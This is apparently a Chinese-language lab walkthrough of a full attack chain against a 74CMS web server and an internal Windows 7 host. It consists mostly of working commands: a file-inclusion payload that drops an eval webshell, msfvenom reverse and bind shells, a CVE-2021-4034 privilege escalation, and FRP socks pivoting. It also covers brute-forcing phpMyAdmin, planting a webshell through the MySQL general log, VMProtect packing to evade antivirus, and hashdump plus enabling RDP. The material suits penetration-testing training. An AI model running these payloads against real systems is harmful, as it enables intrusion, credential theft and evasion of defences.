靶机信息
#攻击机
OS:kali
NIC:192.168.111.129
#Web机器
OS:Ubuntu
Server:骑士CMS/宝塔
NIC1:192.168.111.150
NIC2:10.0.20.131
userpass:eval/vulntarget
#内网机器
OS:windows7
Server:phpstudy
NIC:10.0.20.129
userpass:crow/admin
网络配置
一、边界机器
1.1信息收集
nmap -sn 192.168.111.0/24
1.2端口扫描
nmap -sT 192.168.111.150
1.3网页访问81端口
2.1查询骑士CMS相关版本漏洞,发现其存在任意文件包含漏洞
2.2利用Hackbar写入payload
URL:http://192.168.111.150:81/index.php?m=home&a=assign_resume_tpl
Payload:variable=1&tpl=<?php fputs(fopen("1.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
2.3开始进行文件包含
URL:http://192.168.111.150:81/index.php?m=home&a=assign_resume_tpl
POST:variable=1&tpl=data/Runtime/Logs/Home/23_08_08.log
//日志信息为年份_月份_日期.log
2.4浏览器访问生成的1.php,尝试用蚁剑连接
3.1尝试使用kali生成反向马上线msf
#反向马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=1111 -f elf > 2.elf
#提权
chmod 777 2.elf
#开启监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.111.129
set lport 1111
run
成功上线
3.2使用CVE-2021-4034进行提权
工具地址:https://github.com/arthepsy/CVE-2021-4034
执行命令:
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
二、内网机器
1信息收集,搭建代理
信息收集:
ipconfig
添加路由:
use post/multi/manage/autoroute
set session 1
run
添加代理(FRP):
服务端:
frpc.ini:bind_port = 7000
客户端:
[common]
server_addr = 192.168.111.129
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 8090
plugin = socks5
添加代理
kali:
./frps -c frpx.ini
ubuntu:
./frpc -c frpc.ini
2.进行主机扫描
use auxiliary/scanner/portscan/tcp
set PORTS 21,22,23,80,443,8080,3389,445
set RHOSTS 10.0.20.0/24
set threads 50
run
3.1配置proxychains并进行端口扫描
socks5 127.0.0.1 8090
proxychains nmap -sT -Pn 10.0.20.129 -p22,23,80,139,445,1433,3306,3389,6379,8080
3.2进行目录扫描
proxychains dirb http://10.0.20.129
4.配置代理访问/phpmyadmin,并进行暴力破解
username:root
password:root
5.在phpinfo.php页面下发现绝对路径,通过写日志进行Getshell
show global variables like "%genera%";
set global general_log='on';
SET global general_log_file='C:/phpstudy/PHPTutorial/WWW/cmd.php';
SELECT '<?php @eval($_POST["cmd"]); ?>';
set global general_log='off';
6.蚁剑配置代理进行连接
7.简单信息收集
whoami // win-d4s86jo2r26\crow
ping www.baidu.com // 不出网络环境
tasklist /svc // 存在火绒
8.kali生成正向马并做免杀,上线msf
正向马生成:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=2222 -f exe > 1.exe
开启监听:
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 2222
set rhost 10.0.20.129
run
使用VMProtect加壳
成功上线
9.抓取明文密码并破解,尝试远程桌面
getsystem
hashdump
run post/windows/manage/enable_rdp
密码解密
username:crow
password:admin
远程桌面
proxychains rdesktop 10.0.20.129